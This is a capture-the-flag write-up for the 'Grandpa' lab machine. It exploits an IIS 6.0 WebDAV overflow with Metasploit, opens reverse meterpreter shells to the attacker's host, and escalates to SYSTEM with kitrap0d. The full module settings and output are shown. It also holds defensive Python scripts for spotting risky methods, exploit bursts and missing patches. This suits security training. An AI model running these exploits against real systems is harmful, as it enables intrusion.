
Grandpa is a Windows machine rated easy. The machine runs a vulnerable version of IIS which we are able to exploit to gain access; however, the session we land in does not run as SYSTEM. We end up having to migrate into another process to get a usable user context, then exploit a second vulnerability to escalate privileges to SYSTEM. As SYSTEM, our quest for the flags is over.
Table of Contents
- Reconnaissance
- Enumeration
- Exploit using Metasploit
- Post Exploitation
- Privilege Escalation
- Defender’s Note
Reconnaissance
Let’s start by running an nmap scan to identify the running services.
$ nmap -A -T4 -p- 10.10.10.14
We get the following results, indicating that HTTP is the only open port. We also see that the machine is running Microsoft IIS httpd 6.0 with WebDAV enabled, and that it allows potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| Server Date: Tue, 29 Jun 2021 20:18:13 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
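The nmap output above is built from the server’s reply to an OPTIONS request: the Public header lists what the server supports globally and the Allow header lists what it permits for the requested path. The following is an added example (not part of the original writeup) that a defender can run against their own IIS hosts’ OPTIONS responses to flag the same risky methods nmap reports; the sample response is constructed to mirror the scan output above, and the function names are my own.

```python
"""Flag risky HTTP/WebDAV methods advertised by a web server.

Added example, not from the original writeup. It parses a raw HTTP OPTIONS
response and reports which methods that nmap's http-methods script labels
"potentially risky" are advertised in the Allow and Public headers, the two
headers shown in the http-webdav-scan output above. The sample response is
constructed to match that output; the function names are my own.
"""
from __future__ import annotations

# The method list nmap flagged as potentially risky in the scan above.
RISKY_METHODS = frozenset({
    "TRACE", "COPY", "PROPFIND", "SEARCH", "LOCK", "UNLOCK",
    "DELETE", "PUT", "MOVE", "MKCOL", "PROPPATCH",
})

# WebDAV methods defined by RFC 4918; advertising any of them means the
# WebDAV extension is loaded even if no DAV header is present.
WEBDAV_METHODS = frozenset({
    "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK",
})


def parse_response(raw: str) -> tuple[int, dict[str, str]]:
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased; a repeated header has its values joined
    with ", " so list-valued headers such as Allow are never silently lost.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate a malformed header line instead of aborting
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return int(parts[1]), headers


def methods_in(header_value: str | None) -> set[str]:
    """Turn 'OPTIONS, GET, HEAD' into {'OPTIONS', 'GET', 'HEAD'}."""
    if not header_value:
        return set()
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def assess(raw: str) -> dict:
    """Summarise what an OPTIONS response exposes.

    'risky_allowed' are risky methods the server accepts for the requested
    resource (Allow); 'risky_public_only' are risky methods the server
    supports globally (Public) but did not allow for this resource, still
    worth reviewing because another path may allow them.
    """
    status, headers = parse_response(raw)
    allowed = methods_in(headers.get("allow"))
    public = methods_in(headers.get("public"))
    advertised = allowed | public
    return {
        "status": status,
        "server": headers.get("server", ""),
        "webdav": bool(advertised & WEBDAV_METHODS) or "dav" in headers,
        "risky_allowed": sorted(allowed & RISKY_METHODS),
        "risky_public_only": sorted((public - allowed) & RISKY_METHODS),
    }


# Constructed OPTIONS response mirroring the nmap http-webdav-scan output.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
    "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for key, value in assess(SAMPLE_RESPONSE).items():
        print(f"{key:>18}: {value}")
```

Anything listed under risky_allowed is accepted for the queried path right now; anything under risky_public_only is a capability the server still carries and should be disabled at the server level rather than per path.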
Enumeration
Let’s first check the website by navigating to it in the browser. We get the following page.

A quick check for the page source reveals nothing in particular.

A quick Google search shows a buffer overflow vulnerability for this IIS version on Exploit-DB, and that a Metasploit module exists for it.

We can confirm this using searchsploit.
$ searchsploit ScStoragePathFromUrl
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploit using Metasploit
Let’s start Metasploit and search for the module.
$ msfconsole
msf6 > search ScStoragePathFromUrl
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
We can verify the options that we need to set for the module.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
When we set the required options and run the module, we successfully get a meterpreter session.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.14:1031) at 2021-06-29 22:03:47 +0100
meterpreter >
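The module brute-forces the physical path length (“Trying path length 3 to 60”), so from the server’s side the exploit is a burst of WebDAV requests from a single client inside a short window. The following is an added detection example, not part of the original writeup, that parses IIS W3C extended log lines (honouring the #Fields directive) and alerts when one client sends a threshold of WebDAV-method requests within a sliding window. The log lines are constructed, not taken from the target; the threshold and window are my own choices.

```python
"""Spot WebDAV request bursts in IIS W3C logs.

Added example, not from the original writeup. The Metasploit run above
brute-forces the physical path length, which shows up server-side as a
burst of WebDAV requests from one client. This script parses IIS W3C
extended log lines and alerts on such bursts. The log lines are constructed;
field names are the standard W3C ones; thresholds are mine.
"""
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Iterable, Iterator

# WebDAV methods (RFC 4918) plus SEARCH, as advertised in the scan above.
WEBDAV_METHODS = frozenset({
    "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH",
})


def parse_w3c(lines: Iterable[str]) -> Iterator[dict[str, str]]:
    """Yield one dict per data line, keyed by the names in the #Fields line."""
    fields: list[str] | None = None
    for line in lines:
        line = line.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()  # field set can change mid-file
            continue
        if fields is None:
            raise ValueError("data line before any #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # skip a malformed line rather than mis-assign columns
        yield dict(zip(fields, values))


def detect_webdav_bursts(lines: Iterable[str], threshold: int = 20,
                         window: timedelta = timedelta(seconds=60)) -> list[dict]:
    """Alert once per client that sends >= threshold WebDAV requests in window."""
    recent: dict[str, deque[datetime]] = defaultdict(deque)
    alerted: set[str] = set()
    alerts: list[dict] = []
    for rec in parse_w3c(lines):
        if rec.get("cs-method", "").upper() not in WEBDAV_METHODS:
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        client = rec["c-ip"]
        q = recent[client]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop requests that fell out of the sliding window
        if len(q) >= threshold and client not in alerted:
            alerted.add(client)
            alerts.append({"client": client, "count": len(q),
                           "first": q[0], "last": ts, "uri": rec.get("cs-uri-stem", "-")})
    return alerts


def constructed_log() -> list[str]:
    """Build a small constructed IIS 6 log: normal traffic plus one burst."""
    base = datetime(2021, 6, 29, 20, 18, 0)
    fmt = "%Y-%m-%d %H:%M:%S"
    header = [
        "#Software: Microsoft Internet Information Services 6.0",
        "#Version: 1.0",
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
        "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    ]

    def row(t: datetime, method: str, uri: str, client: str, status: int) -> str:
        return (f"{t.strftime(fmt)} 10.10.10.14 {method} {uri} - 80 - {client} "
                f"Mozilla/5.0+(constructed) {status} 0 0")

    data = []
    # A normal visitor: GETs and an occasional PROPFIND spread over ten minutes.
    for i in range(5):
        data.append(row(base + timedelta(minutes=2 * i), "GET", "/", "10.10.14.5", 200))
        data.append(row(base + timedelta(minutes=2 * i, seconds=30), "PROPFIND", "/", "10.10.14.5", 207))
    # The burst: 25 PROPFINDs two seconds apart from one client (constructed).
    for i in range(25):
        data.append(row(base + timedelta(minutes=1, seconds=2 * i), "PROPFIND", "/", "10.10.14.24", 500))
    return header + sorted(data)  # ISO timestamps sort correctly as strings


if __name__ == "__main__":
    for alert in detect_webdav_bursts(constructed_log()):
        print(alert)
```

The detector keys on method and rate only, not on response status, because the status the server returns while being exploited varies; the sliding window is per client, so it survives an unordered log as long as each client’s own lines are in order.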
Post Exploitation
A quick check of who we are logged in as fails.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
Since we cannot determine our user, we can try to migrate into a process that runs under a known user context. Let’s list the running processes and pick one that shows a user.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
584 396 svchost.exe
672 396 svchost.exe
728 396 svchost.exe
744 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
756 396 svchost.exe
792 396 svchost.exe
928 396 spoolsv.exe
956 396 msdtc.exe
976 1448 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
1068 396 cisvc.exe
1112 396 svchost.exe
1172 396 inetinfo.exe
1208 396 svchost.exe
1320 396 VGAuthService.exe
1400 396 vmtoolsd.exe
1448 396 svchost.exe
1588 396 svchost.exe
1700 396 alg.exe
1760 348 logon.scr
1824 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1856 976 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
1908 396 dllhost.exe
2296 584 wmiprvse.exe
3928 1068 cidaemon.exe
3972 1068 cidaemon.exe
3996 1068 cidaemon.exe
4048 1856 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 744
[*] Migrating from 1856 to 744...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Now that we have a user, let’s drop into shell and see if there is anything interesting.
meterpreter > shell
Process 3200 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\WINDOWS
12/24/2017 08:27 PM <DIR> .
12/24/2017 08:27 PM <DIR> ..
06/29/2021 11:07 PM 0 0.log
04/12/2017 04:41 PM <DIR> ADAM
04/12/2017 04:41 PM <DIR> addins
04/12/2017 04:41 PM <DIR> ADFS
02/18/2007 03:00 PM 1,041,920 adfs.msp
04/12/2017 05:26 PM 834 AdfsOcm.log
//TRUNCATED
02/18/2007 03:00 PM 707 _default.pif
87 File(s) 8,925,261 bytes
40 Dir(s) 18,090,725,376 bytes free
We don’t see a user directory under C:\WINDOWS.
Privilege Escalation
Let’s exit the shell and background the session. We can then search for privilege escalation modules that we can use.
C:\>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
There is only one match in this case. Let’s use it, set its options and run it.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
We get the results below. It looks like there are a couple of exploits that we can use.
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
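Read from the other side, this list is a list of missing patches: every module name that carries an MS bulletin id points at an update that is not installed on the host. The following is an added example, not part of the original writeup and not Metasploit code, that parses the suggester output above into a triage list, putting results that “appear to be vulnerable” ahead of those that “could not be validated” and extracting the bulletin ids to confirm against the host’s installed updates. The sample text is the output shown above; the status labels and function names are my own.

```python
"""Turn local_exploit_suggester output into a patch triage list.

Added example, not from the original writeup or from Metasploit. Each result
line is parsed into the module name, the MS bulletin encoded in the module
name where there is one, and a status derived from the check message. The
sample text is the output shown above; status labels are my own.
"""
from __future__ import annotations

import re

RESULT_LINE = re.compile(
    r"^\[(?P<flag>[+*\-])\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/\S+):\s+(?P<msg>.*)$"
)
# Module names such as ms10_015_kitrap0d carry the Microsoft bulletin id.
BULLETIN = re.compile(r"\bms(\d{2})_(\d{3})")
PRIORITY = {"likely": 0, "unverified": 1, "other": 2}


def classify(msg: str) -> str:
    """Map the suggester's check message to a triage status."""
    m = msg.lower()
    if "appears to be vulnerable" in m:
        return "likely"
    if "could not be validated" in m:
        return "unverified"
    return "other"


def triage(lines) -> list[dict]:
    """Parse result lines; progress lines and Ruby warnings are ignored."""
    rows = []
    for line in lines:
        match = RESULT_LINE.match(line.strip())
        if not match:
            continue
        module = match["module"]
        b = BULLETIN.search(module)
        rows.append({
            "host": match["host"],
            "module": module,
            "bulletin": f"MS{b.group(1)}-{b.group(2)}" if b else None,
            "status": classify(match["msg"]),
        })
    # sorted() is stable, so input order is kept within each status.
    return sorted(rows, key=lambda r: PRIORITY[r["status"]])


def bulletins_to_verify(rows) -> list[str]:
    """Sorted, de-duplicated bulletin ids whose installation should be confirmed."""
    return sorted({r["bulletin"] for r in rows if r["bulletin"] and r["status"] != "other"})


# The suggester output from the writeup, used here as sample input.
SAMPLE_OUTPUT = """\
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
"""

if __name__ == "__main__":
    rows = triage(SAMPLE_OUTPUT.splitlines())
    for r in rows:
        print(f"{r['status']:<10} {r['bulletin'] or '-':<9} {r['module']}")
    print("verify installed:", ", ".join(bulletins_to_verify(rows)))
```

Modules without a bulletin in their name, such as ppr_flatten_rec above, still come out in the triage list; they simply have no id to look up, so the module’s own documentation has to be consulted for the corresponding update.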
Let’s use the first one, set its options and run it.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lport 4445
lport => 4445
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.24:4445
[*] Launching notepad to host the exploit...
[+] Process 3256 launched.
[*] Reflectively injecting the exploit DLL into 3256...
[*] Injecting exploit into 3256 ...
[*] Exploit injected. Injecting payload into 3256...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.24:4445 -> 10.10.10.14:1032) at 2021-06-29 22:39:08 +0100
It looks like we have a session. When we check the user we are running as, we see NT AUTHORITY\SYSTEM, meaning we have rooted the box. Let’s drop into a shell and get the flags.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1244 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
User Flag
To get the user flag, we need to locate the user’s desktop. We find a user called Harry, and user.txt is in his Desktop folder.
C:\Documents and Settings\Administrator\Desktop>cd ../..
cd ../..
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,116,325,376 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5XXXXXXXXXXXXXXXXXXXXa5d869
Root Flag
The root flag is usually on the Administrator’s desktop.
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,090,659,840 bytes free
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator
04/12/2017 05:12 PM <DIR> .
04/12/2017 05:12 PM <DIR> ..
04/12/2017 05:28 PM <DIR> Desktop
04/12/2017 05:12 PM <DIR> Favorites
04/12/2017 05:12 PM <DIR> My Documents
04/12/2017 04:42 PM <DIR> Start Menu
04/12/2017 04:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,090,659,840 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 05:28 PM <DIR> .
04/12/2017 05:28 PM <DIR> ..
04/12/2017 05:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,090,655,744 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e9XXXXXXXXXXXXXXXXXXXXXX28bb7b
Defender’s Note
- Patch systems in a timely manner. We were able to gain access and escalate privileges due to vulnerabilities that had not been patched.